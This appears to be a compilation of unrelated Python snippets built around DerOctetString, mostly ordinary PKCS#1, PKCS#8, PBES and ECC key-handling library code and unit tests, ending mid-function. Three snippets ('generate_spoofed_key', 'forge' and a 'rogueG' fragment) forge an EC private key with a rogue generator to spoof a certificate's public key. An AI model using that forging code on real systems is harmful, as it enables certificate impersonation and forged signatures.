def EMSA_PKCS1_V1_5_ENCODE(hash, emLen): """ Implement the ``EMSA-PKCS1-V1_5-ENCODE`` function, as defined in PKCS#1 v2.1 (RFC3447, 9.2). ``EMSA-PKCS1-V1_5-ENCODE`` actually accepts the message ``M`` as input, and hash it internally. Here, we expect that the message has already been hashed instead. :Parameters: hash : hash object The hash object that holds the digest of the message being signed. emLen : int The length the final encoding must have, in bytes. :attention: the early standard (RFC2313) stated that ``DigestInfo`` had to be BER-encoded. This means that old signatures might have length tags in indefinite form, which is not supported in DER. Such encoding cannot be reproduced by this function. :attention: the same standard defined ``DigestAlgorithm`` to be of ``AlgorithmIdentifier`` type, where the PARAMETERS item is optional. Encodings for ``MD2/4/5`` without ``PARAMETERS`` cannot be reproduced by this function. :Return: An ``emLen`` byte long string that encodes the hash. """ # First, build the ASN.1 DER object DigestInfo: # # DigestInfo ::= SEQUENCE { # digestAlgorithm AlgorithmIdentifier, # digest OCTET STRING # } # # where digestAlgorithm identifies the hash function and shall be an # algorithm ID with an OID in the set PKCS1-v1-5DigestAlgorithms. # # PKCS1-v1-5DigestAlgorithms ALGORITHM-IDENTIFIER ::= { # { OID id-md2 PARAMETERS NULL }| # { OID id-md5 PARAMETERS NULL }| # { OID id-sha1 PARAMETERS NULL }| # { OID id-sha256 PARAMETERS NULL }| # { OID id-sha384 PARAMETERS NULL }| # { OID id-sha512 PARAMETERS NULL } # } # digestAlgo = DerSequence([hash.oid, DerNull().encode()]) digest = DerOctetString(hash.digest()) digestInfo = DerSequence([digestAlgo.encode(), digest.encode()]).encode() # We need at least 11 bytes for the remaining data: 3 fixed bytes and # at least 8 bytes of padding). if emLen < len(digestInfo) + 11: raise ValueError( "Selected hash algorith has a too long digest (%d bytes)." % len(digest)) PS = bchr(0xFF) * (emLen - len(digestInfo) - 3) return b("\x00\x01") + PS + bchr(0x00) + digestInfo
def testEncode1(self): # Empty sequence der = DerOctetString() self.assertEquals(der.encode(), b('\x04\x00')) # Small payload der.payload = b('\x01\x02') self.assertEquals(der.encode(), b('\x04\x02\x01\x02'))
def generate_privkey(d, generator): """ Generate a private key with explicit parameters. """ modulus_bytes = 48 a = P384.a % P384.p public_key = d * generator generator = (b'\x04' + generator.x.to_bytes(modulus_bytes, "big") + generator.y.to_bytes(modulus_bytes, "big")) public_key = (b'\x04' + public_key.x.to_bytes(modulus_bytes, "big") + public_key.y.to_bytes(modulus_bytes, "big")) field_parameters = DerSequence([DerObjectId("1.2.840.10045.1.1"), P384.p]) parameters = [ DerSequence([ 1, field_parameters, DerSequence([ DerOctetString(a.to_bytes(modulus_bytes, "big")), DerOctetString(P384.b.to_bytes(modulus_bytes, "big")) ]), DerOctetString(generator), P384.q, 1 ]) ] seq = [ 1, DerOctetString(d.to_bytes(modulus_bytes, "big")), DerSequence(parameters, implicit=0), DerBitString(public_key, explicit=1) ] return seq
def testEncode1(self): # Empty sequence der = DerOctetString() self.assertEqual(der.encode(), b('\x04\x00')) # Small payload der.payload = b('\x01\x02') self.assertEqual(der.encode(), b('\x04\x02\x01\x02'))
def testDecode1(self): # Empty sequence der = DerOctetString() der.decode(b('\x04\x00')) self.assertEqual(der.payload, b('')) # Small payload der.decode(b('\x04\x02\x01\x02')) self.assertEqual(der.payload, b('\x01\x02'))
def decrypt(data, passphrase): """Decrypt a piece of data using a passphrase and *PBES1*. The algorithm to use is automatically detected. :Parameters: data : byte string The piece of data to decrypt. passphrase : byte string The passphrase to use for decrypting the data. :Returns: The decrypted data, as a binary string. """ enc_private_key_info = DerSequence().decode(data) encrypted_algorithm = DerSequence().decode(enc_private_key_info[0]) encrypted_data = DerOctetString().decode( enc_private_key_info[1]).payload pbe_oid = DerObjectId().decode(encrypted_algorithm[0]).value cipher_params = {} if pbe_oid == _OID_PBE_WITH_MD5_AND_DES_CBC: # PBE_MD5_DES_CBC hashmod = MD5 ciphermod = DES elif pbe_oid == _OID_PBE_WITH_MD5_AND_RC2_CBC: # PBE_MD5_RC2_CBC hashmod = MD5 ciphermod = ARC2 cipher_params['effective_keylen'] = 64 elif pbe_oid == _OID_PBE_WITH_SHA1_AND_DES_CBC: # PBE_SHA1_DES_CBC hashmod = SHA1 ciphermod = DES elif pbe_oid == _OID_PBE_WITH_SHA1_AND_RC2_CBC: # PBE_SHA1_RC2_CBC hashmod = SHA1 ciphermod = ARC2 cipher_params['effective_keylen'] = 64 else: raise PbesError("Unknown OID for PBES1") pbe_params = DerSequence().decode(encrypted_algorithm[1], nr_elements=2) salt = DerOctetString().decode(pbe_params[0]).payload iterations = pbe_params[1] key_iv = PBKDF1(passphrase, salt, 16, iterations, hashmod) key, iv = key_iv[:8], key_iv[8:] cipher = ciphermod.new(key, ciphermod.MODE_CBC, iv, **cipher_params) pt = cipher.decrypt(encrypted_data) return unpad(pt, cipher.block_size)
def finalize_padded(self, pkey): if pkey.key_type not in (HAL_KEY_TYPE_RSA_PRIVATE, HAL_KEY_TYPE_RSA_PUBLIC): return self.finalize() # PKCS #1.5 requires the digest to be wrapped up in an ASN.1 DigestInfo object. from Crypto.Util.asn1 import DerSequence, DerNull, DerOctetString return DerSequence([DerSequence([self._context.oid, DerNull().encode()]).encode(), DerOctetString(self.finalize()).encode()]).encode()
def _export_private_der(self, include_ec_params=True): assert self.has_private() # ECPrivateKey ::= SEQUENCE { # version INTEGER { ecPrivkeyVer1(1) } (ecPrivkeyVer1), # privateKey OCTET STRING, # parameters [0] ECParameters {{ NamedCurve }} OPTIONAL, # publicKey [1] BIT STRING OPTIONAL # } # Public key - uncompressed form modulus_bytes = self.pointQ.size_in_bytes() public_key = (b'\x04' + self.pointQ.x.to_bytes(modulus_bytes) + self.pointQ.y.to_bytes(modulus_bytes)) seq = [ 1, DerOctetString(self.d.to_bytes(modulus_bytes)), DerObjectId(self._curve.oid, explicit=0), DerBitString(public_key, explicit=1) ] if not include_ec_params: del seq[2] return DerSequence(seq).encode()
def encode_EncryptedPrivateKeyInfo(self, der): from Crypto.Util.asn1 import DerSequence, DerOctetString return DerSequence([ DerSequence([ chr(0x06) + chr(len(self.oid_aesKeyWrap)) + self.oid_aesKeyWrap ]).encode(), DerOctetString(der).encode() ]).encode()
def _encode(self, message): hash_oid = self.hash_function.get_OID() digest = self.hash_function.hash(message) der_digest = DerOctetString(digest).encode() der_null = DerNull().encode() der_sequence = DerSequence([hash_oid, der_null]).encode() hash_info = DerSequence([der_sequence, der_digest]).encode() hash_size = len(hash_info) padding = '\xff'*(self.n_size - hash_size - 3) return '\x00\x01' + padding + '\0' + hash_info
def pkcs1_v1_5_encode(msg_hash: SHA256.SHA256Hash, emLen: int) -> bytes: # this code is copied from EMSA_PKCS1_V1_5_ENCODE # https://github.com/dlitz/pycrypto/blob/v2.7a1/lib/Crypto/Signature/PKCS1_v1_5.py#L173 digestAlgo = DerSequence([ DerObjectId(msg_hash.oid).encode() ]) #if with_hash_parameters: if True: digestAlgo.append(DerNull().encode()) digest = DerOctetString(msg_hash.digest()) digestInfo = DerSequence([ digestAlgo.encode(), digest.encode() ]).encode() # We need at least 11 bytes for the remaining data: 3 fixed bytes and # at least 8 bytes of padding). if emLen<len(digestInfo)+11: raise TypeError("Selected hash algorith has a too long digest (%d bytes)." % len(digest)) PS = b'\xFF' * (emLen - len(digestInfo) - 3) return b'\x00\x01' + PS + b'\x00' + digestInfo
def generate_spoofed_key(pubkey): x = int(pubkey[0:96], 16) y = int(pubkey[96:], 16) # Generate rogue generator # Generate degenerate case rogue generator privkey = '\x01' rogueG = unhexlify(b"04" + hex2(x).encode() + hex2(y).encode()) # Generate the file with explicit parameters der = get_der(ec_key_template) # Replace private key octet_der = DerOctetString(privkey) der[1] = octet_der.encode() # Replace public key der[3] = b"\xa1\x64\x03b\x00" + unhexlify(b"04" + pubkey) # Replace the generator seq_der = DerSequence() seq_der.decode(der[2][4:]) s = seq_der._seq octet_der = DerOctetString(rogueG) s[3] = octet_der.encode() seq_der = DerSequence(s) der[2] = der[2][:4] + seq_der.encode() seq_der = DerSequence(der) return PEMHelper.PEMEncode(seq_der.encode(), 'EC PRIVATE KEY')
def parse_EncryptedPrivateKeyInfo(self, der): from Crypto.Util.asn1 import DerObject, DerSequence, DerOctetString, DerObjectId encryptedPrivateKeyInfo = DerSequence() encryptedPrivateKeyInfo.decode(der) encryptionAlgorithm = DerSequence() algorithm = DerObjectId() encryptedData = DerOctetString() encryptionAlgorithm.decode(encryptedPrivateKeyInfo[0]) DerObject.decode(algorithm, encryptionAlgorithm[0]) DerObject.decode(encryptedData, encryptedPrivateKeyInfo[1]) if algorithm.payload != self.oid_aesKeyWrap: raise ValueError return encryptedData.payload
def testDecode1(self): # Empty sequence der = DerOctetString() der.decode(b('\x04\x00')) self.assertEquals(der.payload, b('')) # Small payload der.decode(b('\x04\x02\x01\x02')) self.assertEquals(der.payload, b('\x01\x02'))
def CRYPTO_EMSA_PKCS1_V1_5_ENCODE(M, emLen): msg_hash = SHA256.new(M) digestAlgo = DerSequence([DerObjectId(msg_hash.oid).encode()]) print(digestAlgo) digestAlgo.append(DerNull().encode()) digest = DerOctetString(msg_hash.digest()) digestInfo = DerSequence([digestAlgo.encode(), digest.encode()]).encode() print("%x" % int.from_bytes(digestInfo, byteorder='big')) print("%x" % int.from_bytes(digestAlgo.encode(), byteorder='big')) print("%x" % int.from_bytes(digest.encode(), byteorder='big')) print("%x" % int.from_bytes(msg_hash.digest(), byteorder='big')) #b91d0b7a09f57c109926a449647283adb5dc213c0fdb0cf2b219e064cc132273 2004 00 0501020403650148866009060d30 3130 # 501020403650148866009060d30 #b91d0b7a09f57c109926a449647283adb5dc213c0fdb0cf2b219e064cc132273 2004 #b91d0b7a09f57c109926a449647283adb5dc213c0fdb0cf2b219e064cc132273 #b91d0b7a09f57c109926a449647283adb5dc213c0fdb0cf2b219e064cc1322732004000501020403650148866009060d30313000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0100 #3031 300d06096086480165030402010500 0420 732213cc64e019b2f20cdb0f3c21dcb5ad83726449a42699107cf5097a0b1db9 # 300d06096086480165030402010500 # 0420 732213cc64e019b2f20cdb0f3c21dcb5ad83726449a42699107cf5097a0b1db9 # 732213cc64e019b2f20cdb0f3c21dcb5ad83726449a42699107cf5097a0b1db9 #0001ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff003031300d060960864801650304020105000420732213cc64e019b2f20cdb0f3c21dcb5ad83726449a42699107cf5097a0b1db9 # We need at least 11 bytes for the remaining data: 3 fixed bytes and # at least 8 bytes of padding). if emLen < len(digestInfo) + 11: raise TypeError( "Selected hash algorith has a too long digest (%d bytes)." % len(digest)) PS = b'\xFF' * (emLen - len(digestInfo) - 3) out = b'\x00\x01' + PS + b'\x00' + digestInfo print("%x" % int.from_bytes(out, byteorder='big')) return out
def _import_private_der(encoded, passphrase, curve_oid=None): # See RFC5915 https://tools.ietf.org/html/rfc5915 # # ECPrivateKey ::= SEQUENCE { # version INTEGER { ecPrivkeyVer1(1) } (ecPrivkeyVer1), # privateKey OCTET STRING, # parameters [0] ECParameters {{ NamedCurve }} OPTIONAL, # publicKey [1] BIT STRING OPTIONAL # } private_key = DerSequence().decode(encoded, nr_elements=(3, 4)) if private_key[0] != 1: raise ValueError("Incorrect ECC private key version") try: parameters = DerObjectId(explicit=0).decode(private_key[2]).value if curve_oid is not None and parameters != curve_oid: raise ValueError("Curve mismatch") curve_oid = parameters except ValueError: pass if curve_oid is None: raise ValueError("No curve found") for curve_name, curve in _curves.items(): if curve.oid == curve_oid: break else: raise UnsupportedEccFeature("Unsupported ECC curve (OID: %s)" % curve_oid) scalar_bytes = DerOctetString().decode(private_key[1]).payload modulus_bytes = curve.p.size_in_bytes() if len(scalar_bytes) != modulus_bytes: raise ValueError("Private key is too small") d = Integer.from_bytes(scalar_bytes) # Decode public key (if any) if len(private_key) == 4: public_key_enc = DerBitString(explicit=1).decode(private_key[3]).value public_key = _import_public_der(curve_oid, public_key_enc) point_x = public_key.pointQ.x point_y = public_key.pointQ.y else: point_x = point_y = None return construct(curve=curve_name, d=d, point_x=point_x, point_y=point_y)
def _import_private_der(encoded, passphrase, curve_name=None): # ECPrivateKey ::= SEQUENCE { # version INTEGER { ecPrivkeyVer1(1) } (ecPrivkeyVer1), # privateKey OCTET STRING, # parameters [0] ECParameters {{ NamedCurve }} OPTIONAL, # publicKey [1] BIT STRING OPTIONAL # } private_key = DerSequence().decode(encoded, nr_elements=(3, 4)) if private_key[0] != 1: raise ValueError("Incorrect ECC private key version") try: curve_name = DerObjectId(explicit=0).decode(private_key[2]).value except ValueError: pass if curve_name != _curve.oid: raise UnsupportedEccFeature("Unsupported ECC curve (OID: %s)" % curve_name) scalar_bytes = DerOctetString().decode(private_key[1]).payload order_bytes = _curve.order.size_in_bytes() if len(scalar_bytes) != order_bytes: raise ValueError("Private key is too small") d = Integer.from_bytes(scalar_bytes) # Decode public key (if any, it must be P-256) if len(private_key) == 4: public_key_enc = DerBitString(explicit=1).decode(private_key[3]).value public_key = _import_public_der(curve_name, public_key_enc) point_x = public_key.pointQ.x point_y = public_key.pointQ.y else: point_x = point_y = None return construct(curve="P-256", d=d, point_x=point_x, point_y=point_y)
def forge(certificate_path: str, key_pem: str): """ given a valid certificate_path and key_pem create a forged key """ public_key_point = get_public_key(certificate_path) Q = Point(int(public_key_point[0:96], 16), int(public_key_point[96:], 16), curve=P384) # Generate rogue generator privkey_inv = 2 # we take the private key as being the inverse of 2 modulo the curve order private_key = gmpy2.invert(privkey_inv, P384.q) # pylint: disable=c-extension-no-member private_key = unhexlify(f"{private_key:x}".encode()) # we multply our public key Q with the inverse of our chosen private key value roug_g = privkey_inv * Q roug_g = unhexlify(b"04" + f"{roug_g.x:x}".encode() + f"{roug_g.y:x}".encode()) # Generate the file with explicit parameters with open(key_pem, mode="rt") as handle: keyfile = PEM.decode(handle.read()) seq_der = DerSequence() der = seq_der.decode(keyfile[0]) # Replace private key octet_der = DerOctetString(private_key) der[1] = octet_der.encode() # Replace public key bits_der = DerBitString(unhexlify(b"04" + public_key_point)) der[3] = b"\xa1\x64" + bits_der.encode() # Replace the generator seq_der = DerSequence() s = seq_der.decode(der[2][4:]) # pylint: disable=invalid-name octet_der = DerOctetString(roug_g) s[3] = octet_der.encode() der[2] = der[2][:4] + s.encode() return PEM.encode(der.encode(), "EC PRIVATE KEY")
def testErrDecode1(self): # No leftovers allowed der = DerOctetString() self.assertRaises(ValueError, der.decode, b('\x04\x01\x01\xff'))
def testDecode2(self): # Verify that decode returns the object der = DerOctetString() self.assertEqual(der, der.decode(b('\x04\x00')))
def pkcs1_hash_and_pad(text): return DerSequence([ DerSequence([SHA256.oid, DerNull().encode()]).encode(), DerOctetString(SHA256(text).digest()).encode() ]).encode()
def testInit1(self): der = DerOctetString(b('\xFF')) self.assertEquals(der.encode(), b('\x04\x01\xFF'))
def SignTransaction(UnsignedTx, prK): h = hs.sha256(hs.sha256(UnsignedTx.encode('utf-8')).digest()).digest() sk = SigningKey.from_string(prK, curve=SECP256k1) sig = sk.sign(h) derSig = DerOctetString(sig) return (derSig.encode())
def unwrap(p8_private_key, passphrase=None): """Unwrap a private key from a PKCS#8 blob (clear or encrypted). Args: p8_private_key (byte string): The private key wrapped into a PKCS#8 blob, DER encoded. passphrase (byte string or string): The passphrase to use to decrypt the blob (if it is encrypted). Return: A tuple containing #. the algorithm identifier of the wrapped key (OID, dotted string) #. the private key (byte string, DER encoded) #. the associated parameters (byte string, DER encoded) or ``None`` Raises: ValueError : if decoding fails """ if passphrase: passphrase = tobytes(passphrase) found = False try: p8_private_key = PBES1.decrypt(p8_private_key, passphrase) found = True except PbesError as e: error_str = "PBES1[%s]" % str(e) except ValueError: error_str = "PBES1[Invalid]" if not found: try: p8_private_key = PBES2.decrypt(p8_private_key, passphrase) found = True except PbesError as e: error_str += ",PBES2[%s]" % str(e) except ValueError: error_str += ",PBES2[Invalid]" if not found: raise ValueError("Error decoding PKCS#8 (%s)" % error_str) pk_info = DerSequence().decode(p8_private_key, nr_elements=(2, 3, 4, 5)) if len(pk_info) == 2 and not passphrase: raise ValueError("Not a valid clear PKCS#8 structure " "(maybe it is encrypted?)") # RFC5208, PKCS#8, version is v1(0) # # PrivateKeyInfo ::= SEQUENCE { # version Version, # privateKeyAlgorithm PrivateKeyAlgorithmIdentifier, # privateKey PrivateKey, # attributes [0] IMPLICIT Attributes OPTIONAL # } # # RFC5915, Asymmetric Key Package, version is v2(1) # # OneAsymmetricKey ::= SEQUENCE { # version Version, # privateKeyAlgorithm PrivateKeyAlgorithmIdentifier, # privateKey PrivateKey, # attributes [0] Attributes OPTIONAL, # ..., # [[2: publicKey [1] PublicKey OPTIONAL ]], # ... # } if pk_info[0] == 0: if len(pk_info) not in (3, 4): raise ValueError("Not a valid PrivateKeyInfo SEQUENCE") elif pk_info[0] == 1: if len(pk_info) not in (3, 4, 5): raise ValueError("Not a valid PrivateKeyInfo SEQUENCE") else: raise ValueError("Not a valid PrivateKeyInfo SEQUENCE") algo = DerSequence().decode(pk_info[1], nr_elements=(1, 2)) algo_oid = DerObjectId().decode(algo[0]).value if len(algo) == 1: algo_params = None else: try: DerNull().decode(algo[1]) algo_params = None except: algo_params = algo[1] # PrivateKey ::= OCTET STRING private_key = DerOctetString().decode(pk_info[2]).payload # We ignore attributes and (for v2 only) publickey return (algo_oid, private_key, algo_params)
privkey = gmpy2.invert(privkey_inv, P384.q) privkey = unhexlify(f'{privkey:x}'.encode()) # we multply our public key Q with the inverse of our chosen private key value rogueG = privkey_inv * Q rogueG = unhexlify(b"04" + f'{rogueG.x:x}'.encode() + f'{rogueG.y:x}'.encode()) # Generate the file with explicit parameters f = open('p384-key.pem', 'rt') keyfile = PEM.decode(f.read()) #print(hexlify(keyfile[0])) f.close() seq_der = DerSequence() der = seq_der.decode(keyfile[0]) # Replace private key octet_der = DerOctetString(privkey) der[1] = octet_der.encode() # Replace public key #print(hexlify(der[3])) bits_der = DerBitString(unhexlify(b"04" + pubkey)) der[3] = b"\xa1\x64" + bits_der.encode() #print(hexlify(der[3])) # Replace the generator #print(hexlify(der[2])) seq_der = DerSequence() s = seq_der.decode(der[2][4:]) octet_der = DerOctetString(rogueG) s[3] = octet_der.encode() der[2] = der[2][:4] + s.encode()
def decrypt(data, passphrase): """Decrypt a piece of data using a passphrase and *PBES2*. The algorithm to use is automatically detected. :Parameters: data : byte string The piece of data to decrypt. passphrase : byte string The passphrase to use for decrypting the data. :Returns: The decrypted data, as a binary string. """ enc_private_key_info = DerSequence().decode(data, nr_elements=2) enc_algo = DerSequence().decode(enc_private_key_info[0]) encrypted_data = DerOctetString().decode( enc_private_key_info[1]).payload pbe_oid = DerObjectId().decode(enc_algo[0]).value if pbe_oid != _OID_PBES2: raise PbesError("Not a PBES2 object") pbes2_params = DerSequence().decode(enc_algo[1], nr_elements=2) ### Key Derivation Function selection kdf_info = DerSequence().decode(pbes2_params[0], nr_elements=2) kdf_oid = DerObjectId().decode(kdf_info[0]).value kdf_key_length = None # We only support PBKDF2 or scrypt if kdf_oid == _OID_PBKDF2: pbkdf2_params = DerSequence().decode(kdf_info[1], nr_elements=(2, 3, 4)) salt = DerOctetString().decode(pbkdf2_params[0]).payload iteration_count = pbkdf2_params[1] left = len(pbkdf2_params) - 2 idx = 2 if left > 0: try: kdf_key_length = pbkdf2_params[idx] - 0 left -= 1 idx += 1 except TypeError: pass # Default is HMAC-SHA1 pbkdf2_prf_oid = "1.2.840.113549.2.7" if left > 0: pbkdf2_prf_algo_id = DerSequence().decode(pbkdf2_params[idx]) pbkdf2_prf_oid = DerObjectId().decode( pbkdf2_prf_algo_id[0]).value elif kdf_oid == _OID_SCRYPT: scrypt_params = DerSequence().decode(kdf_info[1], nr_elements=(4, 5)) salt = DerOctetString().decode(scrypt_params[0]).payload iteration_count, scrypt_r, scrypt_p = [ scrypt_params[x] for x in (1, 2, 3) ] if len(scrypt_params) > 4: kdf_key_length = scrypt_params[4] else: kdf_key_length = None else: raise PbesError("Unsupported PBES2 KDF") ### Cipher selection enc_info = DerSequence().decode(pbes2_params[1]) enc_oid = DerObjectId().decode(enc_info[0]).value if enc_oid == _OID_DES_EDE3_CBC: # DES_EDE3_CBC ciphermod = DES3 key_size = 24 elif enc_oid == _OID_AES128_CBC: # AES128_CBC ciphermod = AES key_size = 16 elif enc_oid == _OID_AES192_CBC: # AES192_CBC ciphermod = AES key_size = 24 elif enc_oid == _OID_AES256_CBC: # AES256_CBC ciphermod = AES key_size = 32 else: raise PbesError("Unsupported PBES2 cipher") if kdf_key_length and kdf_key_length != key_size: raise PbesError("Mismatch between PBES2 KDF parameters" " and selected cipher") IV = DerOctetString().decode(enc_info[1]).payload # Create cipher if kdf_oid == _OID_PBKDF2: if pbkdf2_prf_oid == _OID_HMAC_SHA1: hmac_hash_module = SHA1 elif pbkdf2_prf_oid == _OID_HMAC_SHA224: hmac_hash_module = SHA224 elif pbkdf2_prf_oid == _OID_HMAC_SHA256: hmac_hash_module = SHA256 elif pbkdf2_prf_oid == _OID_HMAC_SHA384: hmac_hash_module = SHA384 elif pbkdf2_prf_oid == _OID_HMAC_SHA512: hmac_hash_module = SHA512 else: raise PbesError("Unsupported HMAC %s" % pbkdf2_prf_oid) key = PBKDF2(passphrase, salt, key_size, iteration_count, hmac_hash_module=hmac_hash_module) else: key = scrypt(passphrase, salt, key_size, iteration_count, scrypt_r, scrypt_p) cipher = ciphermod.new(key, ciphermod.MODE_CBC, IV) # Decrypt data pt = cipher.decrypt(encrypted_data) return unpad(pt, cipher.block_size)
def unwrap(p8_private_key, passphrase=None): """Unwrap a private key from a PKCS#8 blob (clear or encrypted). :Parameters: p8_private_key : byte string The private key wrapped into a PKCS#8 blob, DER encoded. passphrase : (byte) string The passphrase to use to decrypt the blob (if it is encrypted). :Return: A tuple containing: #. the algorithm identifier of the wrapped key (OID, dotted string) #. the private key (byte string, DER encoded) #. the associated parameters (byte string, DER encoded) or ``None`` :Raises ValueError: If decoding fails """ if passphrase: passphrase = tobytes(passphrase) found = False try: p8_private_key = PBES1.decrypt(p8_private_key, passphrase) found = True except PbesError as e: error_str = "PBES1[%s]" % str(e) except ValueError: error_str = "PBES1[Invalid]" if not found: try: p8_private_key = PBES2.decrypt(p8_private_key, passphrase) found = True except PbesError as e: error_str += ",PBES2[%s]" % str(e) except ValueError: error_str += ",PBES2[Invalid]" if not found: raise ValueError("Error decoding PKCS#8 (%s)" % error_str) pk_info = DerSequence().decode(p8_private_key, nr_elements=(2, 3, 4)) if len(pk_info) == 2 and not passphrase: raise ValueError("Not a valid clear PKCS#8 structure " "(maybe it is encrypted?)") # # PrivateKeyInfo ::= SEQUENCE { # version Version, # privateKeyAlgorithm PrivateKeyAlgorithmIdentifier, # privateKey PrivateKey, # attributes [0] IMPLICIT Attributes OPTIONAL # } # Version ::= INTEGER if pk_info[0] != 0: raise ValueError("Not a valid PrivateKeyInfo SEQUENCE") # PrivateKeyAlgorithmIdentifier ::= AlgorithmIdentifier # # EncryptedPrivateKeyInfo ::= SEQUENCE { # encryptionAlgorithm EncryptionAlgorithmIdentifier, # encryptedData EncryptedData # } # EncryptionAlgorithmIdentifier ::= AlgorithmIdentifier # AlgorithmIdentifier ::= SEQUENCE { # algorithm OBJECT IDENTIFIER, # parameters ANY DEFINED BY algorithm OPTIONAL # } algo = DerSequence().decode(pk_info[1], nr_elements=(1, 2)) algo_oid = DerObjectId().decode(algo[0]).value if len(algo) == 1: algo_params = None else: try: DerNull().decode(algo[1]) algo_params = None except: algo_params = algo[1] # EncryptedData ::= OCTET STRING private_key = DerOctetString().decode(pk_info[2]).payload return (algo_oid, private_key, algo_params)
def _EMSA_PKCS1_V1_5_ENCODE(msg_hash, emLen, with_hash_parameters=True): """ Implement the ``EMSA-PKCS1-V1_5-ENCODE`` function, as defined in PKCS#1 v2.1 (RFC3447, 9.2). ``_EMSA-PKCS1-V1_5-ENCODE`` actually accepts the message ``M`` as input, and hash it internally. Here, we expect that the message has already been hashed instead. :Parameters: msg_hash : hash object The hash object that holds the digest of the message being signed. emLen : int The length the final encoding must have, in bytes. with_hash_parameters : bool If True (default), include NULL parameters for the hash algorithm in the ``digestAlgorithm`` SEQUENCE. :attention: the early standard (RFC2313) stated that ``DigestInfo`` had to be BER-encoded. This means that old signatures might have length tags in indefinite form, which is not supported in DER. Such encoding cannot be reproduced by this function. :Return: An ``emLen`` byte long string that encodes the hash. """ # First, build the ASN.1 DER object DigestInfo: # # DigestInfo ::= SEQUENCE { # digestAlgorithm AlgorithmIdentifier, # digest OCTET STRING # } # # where digestAlgorithm identifies the hash function and shall be an # algorithm ID with an OID in the set PKCS1-v1-5DigestAlgorithms. # # PKCS1-v1-5DigestAlgorithms ALGORITHM-IDENTIFIER ::= { # { OID id-md2 PARAMETERS NULL }| # { OID id-md5 PARAMETERS NULL }| # { OID id-sha1 PARAMETERS NULL }| # { OID id-sha256 PARAMETERS NULL }| # { OID id-sha384 PARAMETERS NULL }| # { OID id-sha512 PARAMETERS NULL } # } # # Appendix B.1 also says that for SHA-1/-2 algorithms, the parameters # should be omitted. They may be present, but when they are, they shall # have NULL value. digestAlgo = DerSequence([ DerObjectId(msg_hash.oid).encode() ]) if with_hash_parameters: digestAlgo.append(DerNull().encode()) digest = DerOctetString(msg_hash.digest()) digestInfo = DerSequence([ digestAlgo.encode(), digest.encode() ]).encode() # We need at least 11 bytes for the remaining data: 3 fixed bytes and # at least 8 bytes of padding). if emLen<len(digestInfo)+11: raise TypeError("Selected hash algorith has a too long digest (%d bytes)." % len(digest)) PS = b'\xFF' * (emLen - len(digestInfo) - 3) return b'\x00\x01' + PS + b'\x00' + digestInfo
def EMSA_PKCS1_V1_5_ENCODE(hash, emLen): """ Implement the ``EMSA-PKCS1-V1_5-ENCODE`` function, as defined in PKCS#1 v2.1 (RFC3447, 9.2). ``EMSA-PKCS1-V1_5-ENCODE`` actually accepts the message ``M`` as input, and hash it internally. Here, we expect that the message has already been hashed instead. :Parameters: hash : hash object The hash object that holds the digest of the message being signed. emLen : int The length the final encoding must have, in bytes. :attention: the early standard (RFC2313) stated that ``DigestInfo`` had to be BER-encoded. This means that old signatures might have length tags in indefinite form, which is not supported in DER. Such encoding cannot be reproduced by this function. :attention: the same standard defined ``DigestAlgorithm`` to be of ``AlgorithmIdentifier`` type, where the PARAMETERS item is optional. Encodings for ``MD2/4/5`` without ``PARAMETERS`` cannot be reproduced by this function. :Return: An ``emLen`` byte long string that encodes the hash. """ # First, build the ASN.1 DER object DigestInfo: # # DigestInfo ::= SEQUENCE { # digestAlgorithm AlgorithmIdentifier, # digest OCTET STRING # } # # where digestAlgorithm identifies the hash function and shall be an # algorithm ID with an OID in the set PKCS1-v1-5DigestAlgorithms. # # PKCS1-v1-5DigestAlgorithms ALGORITHM-IDENTIFIER ::= { # { OID id-md2 PARAMETERS NULL }| # { OID id-md5 PARAMETERS NULL }| # { OID id-sha1 PARAMETERS NULL }| # { OID id-sha256 PARAMETERS NULL }| # { OID id-sha384 PARAMETERS NULL }| # { OID id-sha512 PARAMETERS NULL } # } # digestAlgo = DerSequence([hash.oid, DerNull().encode()]) digest = DerOctetString(hash.digest()) digestInfo = DerSequence([ digestAlgo.encode(), digest.encode() ]).encode() # We need at least 11 bytes for the remaining data: 3 fixed bytes and # at least 8 bytes of padding). if emLen < len(digestInfo) + 11: raise ValueError("Selected hash algorith has a too long digest (%d bytes)." % len(digest)) PS = bchr(0xFF) * (emLen - len(digestInfo) - 3) return b("\x00\x01") + PS + bchr(0x00) + digestInfo
raise ValueError("Not a valid PrivateKeyInfo SEQUENCE") # PrivateKeyAlgorithmIdentifier ::= AlgorithmIdentifier # # EncryptedPrivateKeyInfo ::= SEQUENCE { # encryptionAlgorithm EncryptionAlgorithmIdentifier, # encryptedData EncryptedData # } # EncryptionAlgorithmIdentifier ::= AlgorithmIdentifier # AlgorithmIdentifier ::= SEQUENCE { # algorithm OBJECT IDENTIFIER, # parameters ANY DEFINED BY algorithm OPTIONAL # } algo = DerSequence().decode(pk_info[1], nr_elements=(1, 2)) algo_oid = DerObjectId().decode(algo[0]).value if len(algo) == 1: algo_params = None else: try: DerNull().decode(algo[1]) algo_params = None except: algo_params = algo[1] # EncryptedData ::= OCTET STRING private_key = DerOctetString().decode(pk_info[2]).payload return (algo_oid, private_key, algo_params)
def encrypt(data, passphrase, protection, prot_params=None, randfunc=None): """Encrypt a piece of data using a passphrase and *PBES2*. :Parameters: data : byte string The piece of data to encrypt. passphrase : byte string The passphrase to use for encrypting the data. protection : string The identifier of the encryption algorithm to use. The default value is '``PBKDF2WithHMAC-SHA1AndDES-EDE3-CBC``'. prot_params : dictionary Parameters of the protection algorithm. +------------------+-----------------------------------------------+ | Key | Description | +==================+===============================================+ | iteration_count | The KDF algorithm is repeated several times to| | | slow down brute force attacks on passwords | | | (called *N* or CPU/memory cost in scrypt). | | | | | | The default value for PBKDF2 is 1 000. | | | The default value for scrypt is 16 384. | +------------------+-----------------------------------------------+ | salt_size | Salt is used to thwart dictionary and rainbow | | | attacks on passwords. The default value is 8 | | | bytes. | +------------------+-----------------------------------------------+ | block_size | *(scrypt only)* Memory-cost (r). The default | | | value is 8. | +------------------+-----------------------------------------------+ | parallelization | *(scrypt only)* CPU-cost (p). The default | | | value is 1. | +------------------+-----------------------------------------------+ randfunc : callable Random number generation function; it should accept a single integer N and return a string of random data, N bytes long. If not specified, a new RNG will be instantiated from ``Crypto.Random``. :Returns: The encrypted data, as a binary string. """ if prot_params is None: prot_params = {} if randfunc is None: randfunc 